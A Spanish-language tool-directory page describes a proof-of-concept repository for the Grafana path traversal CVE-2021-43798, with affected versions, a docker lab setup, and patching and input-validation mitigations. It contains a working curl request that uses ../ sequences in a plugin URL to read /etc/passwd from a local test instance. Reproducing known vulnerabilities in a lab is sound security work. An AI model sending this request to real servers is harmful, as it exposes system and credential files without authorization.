Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-43798 — Exploit de prueba de concepto para la vulnerabilidad de path traversal en Grafana (CVE-2021-43798) que permite lectura no autorizada de archivos mediante directory traversal en rutas de plugins. | Kitploit
Herramientas/GitHubGitHub/lim-ahmin/cve-2021-43798
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHublim-ahmin/cve-2021-43798

CVE-2021-43798

Exploit de prueba de concepto para la vulnerabilidad de path traversal en Grafana (CVE-2021-43798) que permite lectura no autorizada de archivos mediante directory traversal en rutas de plugins.

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-43798

1. Resumen

  • Grafana es una plataforma de código abierto que soporta funciones de monitoreo y gestión de datos. En las versiones siguientes existe una vulnerabilidad de Path Traversal que permite manipular la ruta de archivos mediante caracteres especiales como ../.
    • 8.0.0 y superiores, anteriores a 8.0.7
    • 8.1.0 y superiores, anteriores a 8.1.8
    • 8.2.0 y superiores, anteriores a 8.2.7
    • 8.3.0
  • La ruta vulnerable es <grafana_host_url>/public/plugins/<plugin_id>/, donde <plugin_id> es el ID del plugin instalado. Se puede confirmar la ruta vulnerable a través del siguiente material.
    • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p


2. Configuración y ejecución del entorno vulnerable

2.1 Entorno utilizado

  • Versión Grafana 8.2.5

2.2 Método de ejecución

root@kitploit:~
docker-compose up -d



3. Reproducción de la vulnerabilidad

  • Verificar pantalla abierta Captura de pantalla 2026-07-11 20 31 04



  • Resultado de la ejecución

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Se pudo acceder a etc/passwd.

Captura de pantalla 2026-07-11 19 59 12

4. Conclusión (Medidas de mitigación)

  • Si se utiliza una versión afectada por la vulnerabilidad, se debe actualizar a la versión parcheada 8.3.1, 8.2.7, 8.1.8 u 8.0.7.
  • Para prevenir la vulnerabilidad de Path Traversal, se debe aplicar un enfoque de lista blanca que solo permita el acceso a rutas autorizadas, y realizar validación de la entrada del usuario y normalización de rutas para restringir el acceso a rutas anómalas como el movimiento a directorios superiores (../).

Referencias

  • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • https://www.cve.org/CVERecord?id=CVE-2021-43798
  • https://labex.io/ko/tutorials/nmap-how-to-control-file-path-traversal-420498
  • https://www.youtube.com/watch?v=j8NkNyoYZzU
Descargar herramienta